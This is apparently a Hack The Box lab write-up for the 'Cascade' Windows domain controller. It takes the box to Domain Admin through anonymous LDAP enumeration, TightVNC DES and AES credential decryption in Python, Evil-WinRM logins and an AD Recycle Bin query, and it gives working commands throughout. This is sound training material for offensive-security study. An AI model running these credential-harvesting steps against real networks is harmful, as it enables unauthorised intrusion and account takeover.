Cascade — 0xnrg.se

Hack The Box · Lab

MediumWindowsActive DirectoryPassword Attacks

IP: 10.10.10.182 | Domain: cascade.local | DC: CASC-DC1

Environment Setup

export IP=10.10.10.182
export VPN=$(ip a show tun0 | grep "inet " | awk '{print $2}' | cut -d/ -f1)
echo "10.10.10.182 cascade.local CASC-DC1" >> /etc/hosts

Step 1 — Port Scanning

Why: Identify all open services. On Windows, the combination of LDAP, Kerberos, and SMB immediately confirms a Domain Controller. Knowing the exact OS build helps estimate the likelihood of legacy misconfigurations.

nmap -sCV -p- --min-rate 5000 $IP -oN nmap.out

Output:

PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
49154/tcp open  msrpc

Key findings:

Confirmed Domain Controller — Kerberos, LDAP, DNS all present
WinRM (5985) open — valid creds will give a shell directly
No HTTP — pure AD attack surface
OS: Windows Server 2008 R2 — legacy build, check for LDAP anonymous bind

Step 2 — LDAP User Enumeration

Why: Older AD environments often permit anonymous LDAP binds. Enumerating all user objects without credentials is the fastest way to map targets. Legacy attributes like cascadeLegacyPwd are non-standard — they survive when admins forget to scrub deprecated fields from user objects.

ldapsearch -x -H ldap://$IP -b "DC=cascade,DC=local" "(objectClass=user)" | grep -E "sAMAccountName|cascadeLegacyPwd"

Output:

sAMAccountName: r.thompson
cascadeLegacyPwd: <REDACTED_BASE64>

Key findings:

Anonymous LDAP bind permitted — full user enumeration without credentials
cascadeLegacyPwd attribute found on r.thompson — base64-encoded legacy password
Decoding the attribute directly reveals: r.thompson:<REDACTED>

Step 3 — SMB Enumeration as r.thompson

Why: With valid domain credentials, enumerate every accessible share. IT-related shares like Data frequently contain config files, scripts, and automation artefacts left behind by admins — especially on legacy environments where housekeeping is poor.

nxc smb $IP -u r.thompson -p '<REDACTED>' --shares
smbclient //$IP/Data -U "cascade.local/r.thompson%<REDACTED>" -c "recurse ON; prompt OFF; mget *"

Output:

Share        Permissions
-----        -----------
ADMIN$
C$
Data         READ
IPC$         READ
NETLOGON     READ
SYSVOL       READ

Key findings:

Data share readable — contains IT department files
Found: \IT\Temp\s.smith\VNC Install.reg — TightVNC registry export with encrypted password
VNC password stored as hex-encoded string, encrypted with a well-known static DES key

Step 4 — VNC Password Decryption

Why: TightVNC encrypts stored passwords using a static, publicly-known DES key (e84ad660c4721ae0). The hex value from the registry file can be decrypted deterministically — no cracking needed.

from Crypto.Cipher import DES

key = bytes.fromhex("e84ad660c4721ae0")
enc = bytes.fromhex("<REDACTED_HEX>")
cipher = DES.new(key, DES.MODE_ECB)
print(cipher.decrypt(enc).rstrip(b'\x00').decode())

Output:

<REDACTED>

Key findings:

Credential recovered: s.smith:<REDACTED>
Static DES key is documented in public VNC security research — instant decryption
s.smith has WinRM access based on open port 5985

Step 5 — WinRM Foothold as s.smith

Why: Port 5985 was open and s.smith is a domain user. Evil-WinRM gives an interactive PowerShell session directly on the DC without triggering noisy lateral movement techniques.

evil-winrm -i $IP -u s.smith -p '<REDACTED>'

Output:

*Evil-WinRM* PS C:\Users\s.smith\Documents>

Key findings:

Foothold established as cascade\s.smith
Audit$ share now accessible — contains CascAudit.exe and Audit.db

Step 6 — SQLite Credential Extraction

Why: The Audit$ share contains a SQLite database used by a custom audit tool. Databases created for internal tooling frequently store credentials in minimally-protected form — often just AES-encrypted with the key hardcoded in the accompanying binary.

# Download from Audit$ share
smbclient //$IP/Audit$ -U "cascade.local/s.smith%<REDACTED>" -c "mget *"

sqlite3 Audit.db
.tables
SELECT * FROM Ldap;

Output:

uname    | ArkSvc
pwd      | <REDACTED_BASE64_AES>
domain   | cascade.local

Key findings:

ArkSvc credentials stored as AES-encrypted base64 in the Ldap table
CascAudit.exe and CascCrypto.dll also present — key and IV will be hardcoded

Step 7 — Reverse Engineering CascCrypto.dll

Why: The encryption key and IV must exist somewhere in the binary for the application to function. .NET assemblies are trivially decompiled — the AES key and IV are recoverable as plaintext strings in the decompiled source.

# Decompile with dnSpy or strings
strings CascCrypto.dll | grep -i "key\|iv\|aes"

Output:

c4scadek3y654321   # AES key
1tdyjCbY1Ix49842   # IV

Key findings:

AES-128 CBC, key and IV hardcoded as UTF-8 strings in the DLL
Full decryption now possible without any brute-force

Step 8 — Decrypt ArkSvc Password

Why: With the AES key and IV recovered, decrypting the credential from the SQLite database is a single Python call.

from Crypto.Cipher import AES
import base64

key = b"c4scadek3y654321"
iv  = b"1tdyjCbY1Ix49842"
enc = base64.b64decode("<REDACTED_BASE64_AES>")
cipher = AES.new(key, AES.MODE_CBC, iv)
print(cipher.decrypt(enc).rstrip(b'\x10').decode())

Output:

<REDACTED>

Key findings:

Credential recovered: ArkSvc:<REDACTED>
ArkSvc is a service account — enumerate its group memberships immediately

Step 9 — AD Recycle Bin Privilege Escalation

Why: ArkSvc is a member of the AD Recycle Bin group. This group can read deleted Active Directory objects — including all attributes. A previously deleted TempAdmin account had its cascadeLegacyPwd attribute preserved in the recycle bin, and shared the same password as the built-in Administrator account.

# In Evil-WinRM as ArkSvc
evil-winrm -i $IP -u ArkSvc -p '<REDACTED>'

Get-ADObject -SearchBase "CN=Deleted Objects,DC=cascade,DC=local" `
  -Filter {ObjectClass -eq "user"} `
  -IncludeDeletedObjects `
  -Properties * | Select Name, cascadeLegacyPwd

Output:

Name       : TempAdmin
cascadeLegacyPwd : <REDACTED_BASE64>

Key findings:

TempAdmin deleted object retrieved with all attributes intact
cascadeLegacyPwd on TempAdmin decodes to Administrator's password
AD Recycle Bin preserves all object attributes — never assume deleted == gone

Step 10 — Domain Admin

Why: With the Administrator's password recovered, PSExec or WinRM grants a SYSTEM shell on the Domain Controller.

evil-winrm -i $IP -u Administrator -p '<REDACTED>'

Output:

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cascade\administrator

hostname: CASC-DC1

🏴 MACHINE PWNED — DOMAIN ADMIN ACHIEVED

Credentials

r.thompson:<REDACTED>       # LDAP cascadeLegacyPwd attribute
s.smith:<REDACTED>          # VNC registry DES decrypt
ArkSvc:<REDACTED>           # SQLite AES decrypt
TempAdmin:<REDACTED>        # AD Recycle Bin
Administrator:<REDACTED>    # Same as TempAdmin

Full Attack Chain

Anonymous LDAP bind → cascadeLegacyPwd (r.thompson)
  └─ SMB Data share (READ) → VNC Install.reg (s.smith hex-encrypted)
        └─ VNC DES decrypt (static key) → s.smith:<REDACTED>
              └─ WinRM foothold → Audit$ share (CascAudit.exe + Audit.db)
                    └─ SQLite Ldap table → ArkSvc AES-encrypted creds
                          └─ RE CascCrypto.dll → AES key + IV
                                └─ AES decrypt → ArkSvc:<REDACTED>
                                      └─ AD Recycle Bin → TempAdmin.cascadeLegacyPwd
                                            └─ base64 decode → Administrator:<REDACTED>
                                                  🏴 DOMAIN ADMIN